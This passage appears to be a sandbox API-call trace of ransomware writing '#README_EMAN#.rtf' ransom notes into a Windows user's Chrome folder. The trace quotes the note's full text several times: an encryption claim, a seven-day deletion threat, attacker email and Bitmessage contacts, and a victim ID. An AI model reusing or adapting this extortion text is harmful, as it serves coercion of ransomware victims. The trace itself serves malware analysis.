data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.340] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.341] CloseHandle (hObject=0x2e8) returned 1 [0289.341] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0289.341] GetLastError () returned 0x2 [0289.341] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.341] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 